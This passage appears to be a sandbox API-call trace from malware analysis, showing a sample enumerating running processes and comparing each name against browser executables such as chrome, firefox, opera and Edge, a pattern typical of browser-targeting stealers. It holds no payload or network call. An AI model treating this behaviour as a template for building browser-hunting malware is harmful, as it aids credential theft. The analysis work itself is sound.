(lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0232.837] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0232.837] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0232.837] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.837] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0232.837] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0232.838] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0232.838] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0232.838] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0232.838] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.838] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0232.838] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0232.838] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0232.838] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0232.838] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0232.838] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.838] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0232.839] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0232.839] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0232.839] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0232.839] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0232.839] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.839] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0232.839] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0232.839] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0232.839] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0232.839] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0232.839] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.840] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.840] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0232.840] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0232.840] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0232.840] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0232.840] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.840] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.841] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0232.841] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0232.841] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0232.841] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0232.841] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.841] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.841] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0232.841] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0232.841] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0232.841] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0232.841] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.841] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.842] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0232.842] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0232.842] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0232.842] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0232.842] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.842] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.842] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0232.842] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0232.842] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0232.842] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0232.842] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.842] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0232.843] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0232.843] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0232.843] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0232.843] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0232.843] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.843] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.844] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0232.844] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0232.844] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0232.844] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0232.844] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.844] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.844] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0232.844] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0232.844] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0232.844] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0232.844] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.844] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0232.845] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0232.845] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0232.845] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0232.845] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0232.845] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.845] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0232.845] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0232.845] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0232.845] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0232.845] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0232.845] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.845] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0232.846] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0232.846] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0232.846] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0232.846] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0232.846] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.846] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.847] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0232.847] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0232.847] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0232.847] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0232.847] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.847] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0232.847] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0232.847] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0232.847] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0232.847] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0232.847] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.847] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0232.848] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0232.848] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0232.848] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0232.848] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0232.848] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.848] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0232.848] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0232.848] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0232.848] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0232.848] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0232.848] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.849] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0232.849] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0232.849] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0232.849] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0232.849] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0232.849] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.849] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0232.850] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0232.850] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0232.850] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0232.850] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0232.850] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.850] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0232.850] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0232.850] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0232.850] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0232.850] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0232.850] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.850] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0232.851] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0232.851] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0232.851] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0232.851] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0232.851] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.851] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0232.851] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0232.851] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0232.851] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0232.851] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0232.851] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.851] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0232.852] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0232.852] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0232.852] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0232.852] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0232.852] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.852] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0232.853] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0232.853] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0232.853] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0232.853] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0232.853] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.853] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0232.853] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0232.853] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0232.853] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0232.853] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0232.853] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.853] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0232.854] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0232.854] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0232.854] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0232.854] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0232.854] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.854] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0232.854] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0232.854] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0232.854] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0232.854] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0232.854] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.855] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0232.855] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0232.855] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0232.855] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0232.855] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0232.855] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.855] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0232.856] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0232.856] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0232.856] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0232.856] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0232.856] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.856] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0232.856] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0232.856] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0232.856] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0232.856] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0232.856] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.856] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0232.857] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0232.857] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0232.857] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0232.857] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0232.857] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.857] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0232.857] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0232.857] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0232.857] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0232.857] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0232.858] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.858] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0232.858] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0232.858] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0232.858] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0232.858] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0232.858] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.858] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0232.859] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0232.859] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0232.859] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0232.859] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0232.859] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.859] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, 